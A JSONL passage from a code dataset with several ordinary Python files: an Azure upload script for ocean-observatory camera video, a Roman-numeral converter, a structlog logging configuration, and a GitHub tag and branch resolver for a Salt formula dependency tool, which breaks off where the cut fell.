+{"seq_id":"91895819","text":"#!/usr/bin/env python\n\n# Imports\nimport numpy as np\nimport requests\nfrom bs4 import BeautifulSoup\nfrom azure.storage.blob import BlobServiceClient\nimport yaml\nimport subprocess\nfrom datetime import datetime\nfrom datetime import timedelta\n\n# Constants\nrepodir = '/home/tjc/github/ooicloud/ooi-opendata/'\n\n# Get list of files on raw data server\ndef get_raw_list():\n dates = []\n for i in range(4): # scrape index files from three days ago to present\n dates.append(datetime.now() - timedelta(days=i))\n\n ext = 'mov'\n filelist = []\n\n for date in dates:\n url = 'https://rawdata.oceanobservatories.org/files/RS03ASHS/PN03B/06-CAMHDA301/%i/%02.0f/%02.0f/' % (date.year, date.month, date.day)\n response = requests.get(url)\n if response.ok:\n soup = BeautifulSoup(response.text, 'html.parser')\n filelist = filelist + [url + node.get('href') for node in soup.find_all('a') if node.get('href').endswith(ext)]\n\n return filelist\n\nraw_list = get_raw_list()\n\n# Get list of files on Azure\nwith open(repodir + 'secrets/tjcrone.yml', 'r') as stream:\n keys = yaml.safe_load(stream)\nstorage_account_url = 'https://ooiopendata.blob.core.windows.net'\nblob_service_client = BlobServiceClient(storage_account_url, credential = keys['camhd'])\ncontainer_client = blob_service_client.get_container_client('camhd')\nazure_list = [blob.name for blob in container_client.list_blobs()]\n\n\n# Filter list\ntransfer_list = []\nfor url in raw_list:\n filename = url.split('/')[-1].strip()\n if filename in azure_list:\n blob_client = blob_service_client.get_blob_client(container = 'camhd', blob = filename)\n md5_hash = blob_client.get_blob_properties()['content_settings']['content_md5']\n if not md5_hash:\n transfer_list.append(url)\n if filename not in azure_list:\n transfer_list.append(url)\n\n\n# transfer files\ncontainer = 'https://ooiopendata.blob.core.windows.net/camhd?'\nfor i, url in enumerate(transfer_list):\n filename = url.split('/')[-1].strip()\n size = int(requests.get(url, stream=True).headers['Content-length'])/1024/1024/1024\n if size > 40:\n print('Skipping %s (%f GB)' % (filename, size))\n else:\n print('Copying %s [%i/%i]' % (filename, i+1, len(transfer_list)))\n subprocess.check_output(['wget', '-q', '-O', '/mnt/opendata/%s' % filename, url])\n subprocess.check_output(['/usr/local/bin/azcopy', 'copy', '/mnt/opendata/%s' % filename, container + keys['camhd'], '--put-md5'])\n subprocess.check_output(['rm', '/mnt/opendata/%s' % filename])\n\n\n# delete files on Azure for testing\n#for file_url in files_to_transfer:\n# filename = file_url.split('/')[-1].strip()\n# print('Deleting %s' % filename)\n# blob_client = blob_service_client.get_blob_client(container = 'camhd', blob = filename)\n# blob_client.delete_blob()\n\n\n","sub_path":"scripts/xfer_camhd.py","file_name":"xfer_camhd.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"336514676","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 29 17:06:00 2020\r\n\r\n@author: z\r\n\"\"\"\r\n\r\n\r\ndef romantoint(s):\r\n \r\n \"\"\"\r\n converts roman value to integers\r\n \"\"\"\r\n\r\n dict = {\"M\" : 1000, \"D\" : 500, \"C\" : 100, \"L\":50, \"X\":10, \"V\":5, \"I\":1}\r\n s += 'I'\r\n ans = 0\r\n i = 1\r\n\r\n while i < len(s):\r\n if dict[s[-(i+1)]] < dict[s[-i]]:\r\n ans -= dict[s[-(i+1)]]\r\n else:\r\n ans += dict[s[-(i+1)]]\r\n i += 1\r\n return ans","sub_path":"roman_to_integer.py","file_name":"roman_to_integer.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"342902148","text":"import logging.config\n\nimport structlog\nfrom structlog import configure, processors, stdlib, threadlocal\n\n\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'json': {\n 'format': '%(message)s',\n 'class': 'pythonjsonlogger.jsonlogger.JsonFormatter'\n }\n },\n 'handlers': {\n 'json': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'json'\n }\n },\n 'loggers': {\n '': {\n 'handlers': ['json'],\n 'level': logging.DEBUG\n }\n }\n})\n\nconfigure(\n context_class=threadlocal.wrap_dict(dict),\n logger_factory=stdlib.LoggerFactory(),\n wrapper_class=stdlib.BoundLogger,\n processors=[\n stdlib.filter_by_level,\n stdlib.add_logger_name,\n stdlib.add_log_level,\n stdlib.PositionalArgumentsFormatter(),\n processors.TimeStamper(fmt=\"iso\"),\n processors.StackInfoRenderer(),\n processors.format_exc_info,\n processors.UnicodeDecoder(),\n stdlib.render_to_log_kwargs]\n)\n\nlog = structlog.getLogger()\n","sub_path":"noodle_logging/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"351821321","text":"import json\nimport requests\nimport os\nimport re\nimport sys\nimport pygit2\nfrom parse import parse\nimport urlparse\nfrom distutils.version import LooseVersion\nimport metadata\nfrom errors import ConstraintResolutionException\nfrom errors import GithubRepositoryConnectionException\nimport shaker.libs.logger\nfrom shaker.libs.pygit2_utils import pygit2_parse_error\n\n\nconst_re = re.compile('([=><]+)\\s*(.*)')\ntag_re = re.compile('v[0-9]+\\.[0-9]+\\.[0-9]+')\n\n\ndef parse_github_url(url):\n \"\"\"\n Parse a github url og the form\n git@github.com:test_organisation/test3-formula.git==v3.0.2\n with or witgout constraint and return a\n dictionary of information about it\n\n Args:\n url(string): The github url to parse\n\n Returns:\n debug(dictionary): A dictionary of information\n about the url of the form\n {\n 'source': ,\n 'name': ,\n 'organisation': ,\n 'constraint': \n }\n \"\"\"\n github_root = \"git@github.com:\"\n shaker.libs.logger.Logger().debug(\"github::parse_github_url: \"\n \" Parsing '%s'\"\n % (url))\n constraint = ''\n result = None\n have_constraint = False\n try:\n have_constraint = url.split('.git')[1] != ''\n except IndexError as e:\n msg = (\"github::parse_github_url: Could not split url '%s', '%s'\"\n % (url, e))\n raise IndexError(msg)\n\n if have_constraint:\n result = parse(\"%s{organisation}/{name}.git{constraint}\"\n % (github_root),\n url)\n constraint = result['constraint']\n else:\n result = parse(\"%s{organisation}/{name}.git\"\n % (github_root),\n url)\n shaker.libs.logger.Logger().debug(\"github::parse_github_url:\"\n \"No constraint found for %s\"\n % (url))\n\n organisation = result['organisation']\n name = result['name']\n source = \"%s%s/%s.git\" % (github_root, organisation, name)\n\n info = {\n 'source': source,\n 'name': name,\n 'organisation': organisation,\n 'constraint': constraint,\n }\n return info\n\n\ndef parse_semver_tag(tag):\n \"\"\"\n Convert a tag name into a dictionary of semver compliant\n data. Formats must be of the form,\n v{major}.{minor}.{patch}(-postfix)\n eg,\n v1.2.3\n v1.2.3-prerelease_tag1\n\n Args:\n tag(string): The tag to convert\n\n Returns:\n dictionary: Dictionary of semver compliant data of form,\n { \"major: major_version,\n \"minor\": minor_version,\n \"patch\": patch_version,\n \"postfix\": (posfix-tag)\n }\n If the tag could not be parsed, the values of all keys are set to None.\n \"\"\"\n retval = {\n \"major\": None,\n \"minor\": None,\n \"patch\": None,\n \"postfix\": None,\n }\n\n # Use these regexs to determine the accetable tag type\n version_comparators = {\n 'release': 'v(\\d+).(\\d+).(\\d+)$',\n 'prerelease': 'v(\\d+).(\\d+).(\\d+)-(.+)',\n 'prerelease-compat': 'v(\\d+).(\\d+).(\\d+)(.+)',\n }\n\n # Check for a release v1.2.3\n if re.match(version_comparators[\"release\"], tag):\n parsed_results = parse('v{major:d}.{minor:d}.{patch:d}', tag)\n retval = {\n \"major\": parsed_results[\"major\"],\n \"minor\": parsed_results[\"minor\"],\n \"patch\": parsed_results[\"patch\"],\n \"postfix\": None,\n }\n # Check for a semver compliant prerelease v1.2.3-pre1\n elif re.match(version_comparators[\"prerelease\"], tag):\n parsed_results = parse('v{major:d}.{minor:d}.{patch:d}-{postfix}', tag)\n retval = {\n \"major\": parsed_results[\"major\"],\n \"minor\": parsed_results[\"minor\"],\n \"patch\": parsed_results[\"patch\"],\n \"postfix\": parsed_results[\"postfix\"],\n }\n # Check for a non-semver compliant prerelease v1.2.3pre1\n elif re.match(version_comparators[\"prerelease-compat\"], tag):\n parsed_results = re.match(version_comparators[\"prerelease-compat\"], tag).groups()\n retval = {\n \"major\": int(parsed_results[0]),\n \"minor\": int(parsed_results[1]),\n \"patch\": int(parsed_results[2]),\n \"postfix\": parsed_results[3],\n }\n # Not an acceptable versioned tag\n else:\n shaker.libs.logger.Logger().debug(\"github::parse_semver_tag: \"\n \"Failed to parse tag %s'\"\n % (tag))\n\n return retval\n\n\ndef convert_tag_to_semver(tag):\n \"\"\"\n Convert a tag name into a list of semver compliant data\n Formats must be of the form,\n v{major}.{minor}.{patch}(-postfix)\n eg,\n v1.2.3\n v1.2.3-prerelease_tag1\n\n Args:\n tag(string): The tag to convert\n\n Returns:\n list: List of semver compliant data of form,\n [major_version, minor_version, patch_version, (posfix-tag)]\n Or return an empty list if the tag could not be parsed.\n \"\"\"\n parsed_results = parse_semver_tag(tag)\n rettag = [\n parsed_results[\"major\"],\n parsed_results[\"minor\"],\n parsed_results[\"patch\"],\n parsed_results[\"postfix\"],\n ]\n\n return rettag\n\n\ndef get_valid_tags(org_name,\n formula_name,\n max_tag_count=1000):\n \"\"\"\n Get all semver compliant tags from a repository using the\n formula organisation and name\n\n Args:\n org_name(string): The organisation name of the repository\n formula_name(string): The formula name of the repository\n max_tag_count(int): Limit on amount of tags to fetch\n\n Returns:\n string: The tag that is calculated to be the 'preferred' one\n list: All the tag versions found that were semver compliant\n dictionary: Data for all tags, semver compliant or not\n \"\"\"\n\n github_token = get_valid_github_token()\n if not github_token:\n msg = \"github::get_branch_data: No valid github token\"\n raise GithubRepositoryConnectionException(msg)\n\n tags_url = ('https://api.github.com/repos/%s/%s/tags?per_page=%s'\n % (org_name, formula_name, max_tag_count))\n tag_versions = []\n tags_data = {}\n tags_json = requests.get(tags_url,\n auth=(github_token, 'x-oauth-basic'))\n\n shaker.libs.logger.Logger().debug(\"github::get_valid_tags: \"\n \"Calling validate_github_access with %s \"\n % str(tags_json))\n\n # Check for successful access and any credential problems\n if validate_github_access(tags_json):\n try:\n tags_data = json.loads(tags_json.text)\n for tag in tags_data:\n raw_name = tag['name']\n\n semver_info = convert_tag_to_semver(raw_name)\n # If we have a semver valid tag, then add,\n # otherwise ignore\n if len(semver_info) > 0:\n parsed_tag_version_results = parse('v{tag}', raw_name)\n if parsed_tag_version_results:\n shaker.libs.logger.Logger().debug(\"github::get_valid_tags: \"\n \"Appending valid tag %s'\"\n % (raw_name))\n parsed_tag_version = parsed_tag_version_results[\"tag\"]\n tag_versions.append(parsed_tag_version)\n else:\n shaker.libs.logger.Logger().warning(\"github::get_valid_tags: \"\n \"Ignoring semver invalid tag %s'\"\n % (raw_name))\n\n tag_versions.sort()\n wanted_version = get_latest_tag(tag_versions,\n include_prereleases=False)\n if wanted_version:\n wanted_tag = 'v{0}'.format(wanted_version)\n else:\n wanted_tag = None\n\n except ValueError as e:\n msg = (\"github::get_valid_tags: \"\n \"Invalid json for url '%s': %s\"\n % (tags_url,\n e.message))\n raise ValueError(msg)\n else:\n wanted_tag = None\n\n shaker.libs.logger.Logger().debug(\"github::get_valid_tags: \"\n \"wanted_tag=%s, tag_versions=%s\"\n % (wanted_tag, tag_versions))\n return wanted_tag, tag_versions, tags_data\n\n\ndef get_branch_data(org_name,\n formula_name,\n branch_name):\n \"\"\"\n Get the raw data from github for a specific branch of the repo\n\n Args:\n org_name(string): The organisation name of the repository\n formula_name(string): The formula name of the repository\n branch_name(string): Name of the branch\n\n Returns:\n dictionary: Data for the specific branch or a empty in case of\n problems\n \"\"\"\n\n shaker.libs.logger.Logger().debug(\"github::get_branch_data: \"\n \"starts here: org_name %s \"\n \"formula_name %s branch_name %s\"\n % (org_name, formula_name, branch_name))\n github_token = get_valid_github_token()\n if not github_token:\n msg = \"github::get_branch_data: No valid github token\"\n raise GithubRepositoryConnectionException(msg)\n\n branch_url = ('https://api.github.com/repos/%s/%s/branches/%s'\n % (org_name, formula_name, branch_name))\n shaker.libs.logger.Logger().debug(\"github::get_branch_data: \"\n \"branch_url %s \"\n % (branch_url))\n branch_json = requests.get(branch_url,\n auth=(github_token, 'x-oauth-basic'))\n\n shaker.libs.logger.Logger().debug(\"github::get_branch_data: \"\n \"Calling validate_github_access with %s \"\n % str(branch_json))\n # Check for successful access and any credential problems\n if validate_github_access(branch_json):\n try:\n branch_data = json.loads(branch_json.text)\n except ValueError as e:\n msg = (\"github::get_branch_data: \"\n \"Invalid json for url '%s': %s\"\n % (branch_url,\n e.message))\n raise ValueError(msg)\n else:\n branch_data = None\n\n return branch_data\n\n\ndef get_latest_tag(tag_versions,\n include_prereleases=False):\n \"\"\"\n Get the latest valid semver tag from a list of tag versions.\n Trivially we can return the very latest if we like, but this\n will skip non-release versions by default\n\n Args:\n tag_versions(list): List of tag versions, in format\n [\n \"1.2.3-prerelease1\",\n \"1.1.1\",\n \"0.8.7\"\n ]\n include_prereleases(bool): True to include prereleases\n in looking for latest semver compliant release tags,\n false to only use releases (eg, 1.2.3)\n\n Returns:\n string: tag version of the latest tag, in form \"1.2.3\"\n \"\"\"\n shaker.libs.logger.Logger().debug(\"github::get_latest_tag: \"\n \"Latest from %s\"\n % (tag_versions))\n tag_versions.sort(key=LooseVersion)\n for tag_version in reversed(tag_versions):\n is_release = is_tag_release(\"v%s\" % tag_version)\n is_prerelease = is_tag_prerelease(\"v%s\" % tag_version)\n\n if not include_prereleases:\n if is_release and not is_prerelease:\n shaker.libs.logger.Logger().debug(\"github::get_latest_tag: \"\n \"Found '%s' (excluding pre-releases)\"\n % (tag_version))\n return tag_version\n else:\n if is_release or is_prerelease:\n shaker.libs.logger.Logger().debug(\"github::get_latest_tag: \"\n \"Found '%s' (including pre-releases)\"\n % (tag_version))\n return tag_version\n\n return None\n\n\ndef is_tag_release(tag):\n \"\"\"\n Simple check for a release\n\n Args:\n tag(string): The tag in format v1.2.3\n\n Returns:\n bool: True if format is that of a release,\n false otherwise\n \"\"\"\n parsed_tag = parse_semver_tag(tag)\n valid_version_checks = (\n (parsed_tag[\"major\"] is not None) and\n (parsed_tag[\"minor\"] is not None) and\n (parsed_tag[\"patch\"] is not None)\n )\n if not valid_version_checks:\n shaker.libs.logger.Logger().debug(\"github::is_tag_release: \"\n \"%s is not release, bad version checks\" % (tag))\n return False\n if parsed_tag[\"postfix\"]:\n shaker.libs.logger.Logger().debug(\"github::is_tag_release: \"\n \"%s is not release, contains postfix\" % (tag))\n return False\n\n shaker.libs.logger.Logger().debug(\"github::is_tag_release: \"\n \"%s is release\" % (tag))\n return True\n\n\ndef is_tag_prerelease(tag):\n \"\"\"\n Simple check for a pre-release\n\n Args:\n tag(string): The tag in format v1.2.3-postfix\n\n Returns:\n bool: True if format is that of a pre-release,\n false otherwise\n \"\"\"\n parsed_tag = parse_semver_tag(tag)\n valid_version_checks = (\n (parsed_tag[\"major\"] is not None) and\n (parsed_tag[\"minor\"] is not None) and\n (parsed_tag[\"patch\"] is not None)\n )\n if valid_version_checks and parsed_tag[\"postfix\"]:\n shaker.libs.logger.Logger().debug(\"github::is_tag_prerelease: \"\n \"%s is pre-release\" % (tag))\n return True\n\n shaker.libs.logger.Logger().debug(\"github::is_tag_prerelease: \"\n \"%s is not pre-release\" % (tag))\n return False\n\n\ndef resolve_constraint_to_object(org_name, formula_name, constraint):\n \"\"\"\n For a given formula, take the constraint and compare it to\n the repositories available tags. Then try to find a tag that\n best resolves within the constraint.\n\n If we can get resolutions, return the json data object associated\n with the tag. If not, then raise a ConstraintResolutionException\n\n Args:\n org_name(string): The organisation name of the formula\n formula_name(string): The formula name\n constraint(string): The constraint to be applied, in the form\n . eg, '==v1.0.1', '>=2.0.1'\n\n Returns:\n dictionary: Json data from github associated with the resolved tag\n ConstraintResolutionException: If no resolutions was possible\n \"\"\"\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: \"\n \"resolve_constraint_to_object(%s, %s, %s)\"\n % (org_name, formula_name, constraint))\n\n # do we have a constraint?\n if constraint:\n # is it a branch or a tag?\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"constraint is not empty '%s'\"\n % (org_name, formula_name, constraint))\n parsed_constraint = metadata.parse_constraint(constraint)\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"parsed_constraint '%s'\"\n % (org_name, formula_name, str(parsed_constraint)))\n # is it a branch (i.e. not a version)\n if not parsed_constraint['version']:\n branch_name = parsed_constraint['tag']\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"There is no version, assuming this is \"\n \"a branch, name: '%s'\"\n % (org_name, formula_name, branch_name))\n branch_data = get_branch_data(org_name, formula_name, branch_name)\n if not branch_data:\n raise ConstraintResolutionException(\"github::resolve_constraint_to_object: %s/%s: \"\n \"github did not return any value for \"\n \"branch '%s'\"\n % (org_name, formula_name, branch_name))\n return branch_data\n\n # carry on with version analyses\n wanted_tag, tag_versions, tags_data = get_valid_tags(org_name, formula_name)\n if not constraint or (constraint == ''):\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"No constraint specified, returning '%s'\"\n % (org_name,\n formula_name,\n wanted_tag))\n obj = None\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"type of tags_data: %s\"\n % (org_name,\n formula_name,\n type(tags_data)))\n for tag_data in tags_data:\n if tag_data[\"name\"] == wanted_tag:\n obj = tag_data\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"type of (note no s!) tag_data: %s\"\n % (org_name,\n formula_name,\n type(tag_data)))\n break\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"returning obj: '%s' type: %s\"\n % (org_name,\n formula_name,\n str(obj), type(obj)))\n return obj\n\n parsed_constraint = metadata.parse_constraint(constraint)\n parsed_comparator = parsed_constraint['comparator']\n parsed_tag = parsed_constraint['tag']\n parsed_version = parsed_constraint['version']\n\n # See if we can pick up a version\n if tag_versions and parsed_version:\n if parsed_comparator == '==':\n if parsed_version in tag_versions:\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"Found exact version '%s'\"\n % (org_name,\n formula_name,\n parsed_version))\n obj = None\n for tag_data in tags_data:\n if tag_data[\"name\"] == parsed_tag:\n obj = tag_data\n break\n return obj\n else:\n raise ConstraintResolutionException(\"github::resolve_constraint_to_object: %s/%s: \"\n \"Could not satisfy constraint for '%s', \"\n \" version %s not in tag list %s\"\n % (org_name,\n formula_name,\n constraint,\n parsed_constraint,\n tag_versions))\n else:\n # Get a versioned tag (eg, v1.1.0) that is most greater than,\n # or least less than\n # but also not another type of tag (eg 'fdfsdfdsfsd')\n valid_version = None\n if parsed_comparator == '>=':\n # Get latest non pre-release version\n for tag_version in reversed(tag_versions):\n if (tag_version >= parsed_version):\n if not is_tag_prerelease(tag_version):\n valid_version = tag_version\n break\n else:\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"Skipping pre-release version '%s'\"\n % (org_name,\n formula_name,\n tag_version))\n else:\n raise ConstraintResolutionException(\"github::resolve_constraint_to_object: %s/%s: \"\n \" No non-prerelease version found %s\"\n % (org_name,\n formula_name,\n constraint))\n\n elif parsed_comparator == '<=':\n valid_version = None\n for tag_version in reversed(tag_versions):\n if (tag_version <= parsed_version):\n if not is_tag_prerelease(tag_version):\n valid_version = tag_version\n break\n else:\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"Skipping pre-release version '%s'\"\n % (org_name,\n formula_name,\n tag_version))\n\n if not valid_version:\n raise ConstraintResolutionException(\"github::resolve_constraint_to_object: %s/%s: \"\n \" No non-prerelease version found '%s'\"\n % (org_name,\n formula_name,\n constraint))\n else:\n msg = (\"github::resolve_constraint_to_object: \"\n \"Unknown comparator '%s/%s%s'\" % (org_name,\n formula_name,\n parsed_comparator))\n raise ConstraintResolutionException(msg)\n\n if valid_version:\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"resolve_constraint_to_object:Found valid version '%s'\"\n % (org_name,\n formula_name,\n valid_version))\n valid_tag = 'v%s' % valid_version\n obj = None\n for tag_data in tags_data:\n if tag_data[\"name\"] == valid_tag:\n obj = tag_data\n break\n\n return obj\n else:\n raise ConstraintResolutionException(\"github::resolve_constraint_to_object: %s/%s: \"\n 'Constraint %s cannot be satisfied'\n % (org_name,\n formula_name,\n constraint))\n else:\n msg = (\"github::resolve_constraint_to_object: \"\n \"Unknown parsed constraint '%s' from '%s'\" % (parsed_constraint, constraint))\n raise ConstraintResolutionException(msg)\n raise ConstraintResolutionException(\"github::resolve_constraint_to_object: %s/%s: \"\n 'Constraint {} cannot be satisfied'.format(org_name,\n formula_name,\n constraint))\n return None\n\n\ndef get_valid_github_token(online_validation_enabled=False):\n \"\"\"\n Check for a github token environment variable. If its not there,\n or is invalid, log a message and return None. Otherwise, return the token string\n\n Parameters:\n online_validation_enabled (bool): If True, then try out the credentials against\n the github api for success. No online validation if false\n Returns:\n github_token (string): The valid github token, None if invalid\n \"\"\"\n github_token = None\n\n # A simple check for the right environment variable\n if \"GITHUB_TOKEN\" not in os.environ:\n shaker.libs.logger.Logger().error(\"No github token found. \"\n \"Please set your GITHUB_TOKEN environment variable\")\n else:\n # Test an oauth call to the api, make sure the credentials are\n # valid and we're not locked out\n if online_validation_enabled:\n url = \"https://api.github.com\"\n response = requests.get(url,\n auth=(os.environ[\"GITHUB_TOKEN\"],\n 'x-oauth-basic'))\n\n shaker.libs.logger.Logger().debug(\"github::get_valid_github_token:\"\n \"Calling validate_github_access with %s\" % (str(response)))\n # Validate the response against expected status codes\n # Set the return value to the token if we have success\n valid_response = validate_github_access(response)\n if valid_response:\n github_token = os.environ[\"GITHUB_TOKEN\"]\n shaker.libs.logger.Logger().error(\"No valid repsonse from github token '%s'\"\n % (github_token))\n else:\n # If we're not validating online, just accept that we have a token\n github_token = os.environ[\"GITHUB_TOKEN\"]\n\n return github_token\n\n\ndef validate_github_access(response, url=None):\n \"\"\"\n Validate the github api's response for known credential problems\n\n Checked responses are\n\n * Authenticating with invalid credentials will return 401 Unauthorized:\n\n HTTP/1.1 401 Unauthorized\n {\n \"message\": \"Bad credentials\",\n \"documentation_url\": \"https://developer.github.com/v3\"\n }\n\n * Forbidden\n HTTP/1.1 403 Forbidden\n {\n \"message\": \"Maximum number of login attempts exceeded. Please try again later.\",\n \"documentation_url\": \"https://developer.github.com/v3\"\n }\n\n Args:\n response (requests.models.Response): The Response from the github server\n\n Returns:\n valid_credentials (bool): True if access was successful, false otherwise\n\n \"\"\"\n\n # Assume invalid credentials unless proved otherwise\n shaker.libs.logger.Logger().debug(\"github::validate_github_access:starts here:response: %s\"\n % str(response))\n\n if (type(response) == requests.models.Response):\n\n # Check the status codes for success\n if response.status_code == 200:\n shaker.libs.logger.Logger().debug(\"github::validate_github_access:Github access checked ok\")\n return True\n else:\n # Set a default response message, use the real one if we\n # find it in the response\n response_message = \"No response found\"\n try:\n # Access the responses body as json\n response_json = json.loads(response.text)\n\n if \"message\" in response_json:\n response_message = response_json[\"message\"]\n shaker.libs.logger.Logger().debug(\"Github credentials test got response: %s\"\n % response_json)\n except:\n # Just ignore if we can'l load json, its not essential here\n if (response.status_code == 401) and (\"Bad credentials\" in response_message):\n shaker.libs.logger.Logger().error(\"validate_github_access: \"\n \"Github credentials incorrect: %s\" % response_message)\n elif response.status_code == 403 and (\"Maximum number of login attempts exceeded\" in response_message):\n shaker.libs.logger.Logger().error(\"validate_github_access: \"\n \"Github credentials failed due to lockout: %s\" % response_message)\n elif response.status_code == 404:\n shaker.libs.logger.Logger().debug(\"github::validate_github_access: \"\n \"URL %s not found\" % url)\n else:\n shaker.libs.logger.Logger().warning(\"validate_github_access: \"\n \"Unknown problem checking credentials: %s\" % response)\n else:\n shaker.libs.logger.Logger().error(\"Invalid response: %s\" % response)\n\n return False\n\n\ndef open_repository(url,\n target_directory):\n \"\"\"\n Make a connection from a remote git repository into a local\n directory.\n\n Args:\n url(string): The remote github url of the repository\n target_directory(string): The local target directory\n\n Returns:\n pygit2.repo: The repository object created\n \"\"\"\n git_url = urlparse.urlparse(url)\n username = git_url.netloc.split('@')[0]\\\n if '@' in git_url.netloc else 'git'\n try:\n credentials = pygit2.credentials.KeypairFromAgent(username)\n except AttributeError as e:\n pygit2_parse_error(e)\n\n # If local directory exists, then make a connection to it\n # Otherwise, clone the remote repo into the new directory\n if os.path.isdir(target_directory):\n shaker.libs.logger.Logger().debug(\"open_repository: \"\n \"Opening url '%s' \"\n \"with existing local repository '%s'\"\n % (url, target_directory))\n repo = pygit2.Repository(target_directory)\n else:\n # Try to use pygit2 0.22 cloning\n try:\n shaker.libs.logger.Logger().debug(\"open_repository: \"\n \"Trying to open repository \"\n \"using pygit2 0.22 format\")\n repo = pygit2.clone_repository(url,\n target_directory,\n credentials=credentials)\n except TypeError as e:\n shaker.libs.logger.Logger().debug(\"open_repository: \"\n \"Failed to detect pygit2 0.22\")\n shaker.libs.logger.Logger().debug(\"open_repository: \"\n \"Trying to open repository \"\n \"using pygit2 0.23 format\")\n # Try to use pygit2 0.23 cloning\n callbacks = pygit2.RemoteCallbacks(credentials)\n repo = pygit2.clone_repository(url,\n target_directory,\n callbacks=callbacks)\n\n shaker.libs.logger.Logger().debug(\":open_repository: \"\n \"Cloning url '%s' into local repository '%s'\"\n % (url, target_directory))\n origin = filter(lambda x: x.name == 'origin', repo.remotes)\n if not origin:\n repo.create_remote('origin', url)\n origin = filter(lambda x: x.name == 'origin', repo.remotes)\n origin[0].credentials = credentials\n\n return repo\n\n\ndef install_source(target_source,\n target_directory,\n use_tag=False):\n \"\"\"\n Install the requirement as specified by the formula dictionary and\n return the directory symlinked into the roots_dir. The sha revision\n will be checked out if specified, and if not, then the tag will be\n checked out if present\n\n Args:\n target_source(dictionary): A keyed collection of information about the\n source of the format\n {\n 'name': '',\n 'url': '',\n 'sha': ,\n 'tag': ,\n }\n target_directory(string): THe directory to install into\n use_tag(bool): True to use the tag value for versioning,\n False otherwise\n \"\"\"\n shaker.libs.logger.Logger().debug(\"install_source(%s, %s, %s)\"\n % (target_source,\n target_directory,\n use_tag))\n target_name = target_source.get('name', None)\n target_url = target_source.get('source', None)\n target_sha = target_source.get('sha', None)\n target_tag = target_source.get('tag', None)\n\n target_path = os.path.join(target_directory,\n target_name)\n shaker.libs.logger.Logger().debug(\"install_source: Opening %s in directory %s, \"\n \"with url %s, sha %s, tag %s\"\n % (target_name,\n target_directory,\n target_url,\n target_sha,\n target_tag))\n target_repository = open_repository(target_url, target_path)\n\n if use_tag:\n if target_tag is None:\n shaker.libs.logger.Logger().error(\"github::install_source: Tag usage specified but is empty\")\n return False\n # Look for tag, if not then look for branch\n try:\n parsed_tag = target_repository.revparse_single(target_tag)\n\n # If parsed tag refs a tag object, look for the actual commit object\n if parsed_tag.type == pygit2.GIT_OBJ_TAG:\n target_sha = parsed_tag.peel(pygit2.GIT_OBJ_COMMIT).hex\n else:\n target_sha = parsed_tag.hex\n\n shaker.libs.logger.Logger().debug(\"github::install_source: Found tag sha '%s' for tag '%s'\"\n % (target_sha, target_tag))\n except KeyError:\n # Try to find the branch\n branch = target_repository.lookup_branch((\"origin/%s\" % target_tag),\n pygit2.GIT_BRANCH_REMOTE)\n\n if branch is not None:\n target_repository.checkout(branch)\n parsed_tag = target_repository.revparse_single('HEAD')\n target_sha = parsed_tag.hex\n else:\n shaker.libs.logger.Logger().debug(\"github::install_source: \"\n \"Could not find branch '%s', '%s'\"\n % (target_tag, branch))\n # We couldnt resolve this tag\n shaker.libs.logger.Logger().error(\"github::install_source: Could not find tag or branch %s\"\n % (target_tag))\n return False\n # Use the sha target if it exists, otherwise try the tag value\n else:\n if target_sha is None:\n shaker.libs.logger.Logger().error(\"github::install_source: Raw sha usage specified but is empty\")\n return False\n\n current_sha = get_repository_sha(target_path,\n revision='HEAD')\n # If the local and target shas are the same, skip\n # otherwise, update the repository\n if current_sha == target_sha:\n shaker.libs.logger.Logger().debug(\"github::install_source: %s: \"\n \"Target and current shas are equivalent...\"\n \"skipping update: %s\"\n % (target_path,\n target_sha))\n return True\n else:\n shaker.libs.logger.Logger().debug(\"github::install_source: Found raw sha '%s'\"\n % (target_sha))\n\n # We should have a sha now, use it to setup the repos\n target_oid = pygit2.Oid(hex=target_sha)\n\n target_repository.checkout_tree(target_repository[target_oid].tree)\n shaker.libs.logger.Logger().debug(\"github::install_source: Checking out oid '%s' in '%s\"\n % (target_oid, target_path))\n # The line below is *NOT* just setting a value.\n # Pygit2 internally resets the head of the filesystem to the OID we set.\n target_repository.set_head(target_oid)\n\n if target_repository.head.get_object().hex != target_sha:\n shaker.libs.logger.Logger().debug(\"Resetting sha mismatch on source '%s'\"\n % (target_name))\n target_repository.reset(target_sha, pygit2.GIT_RESET_HARD)\n\n shaker.libs.logger.Logger().debug(\"Source '%s' is at version '%s'\"\n % (target_name, target_sha))\n return True\n\n\ndef get_origin_for_remote(repository):\n \"\"\"\n Find the origin of a remote repository\n\n Args:\n repository(pygit2.repository):\n The remote repository to search\n\n Returns:\n pygit2.remote: The remote origin, None type\n if it couldn't be found\n \"\"\"\n for remote in repository.remotes:\n if remote.name == 'origin':\n url_bits = urlparse.urlparse(remote.url)\n if url_bits.scheme == 'git':\n remote.url = 'ssh://{0}{1}'.format(url_bits.netloc,\n url_bits.path)\n remote.save()\n return remote\n\n return 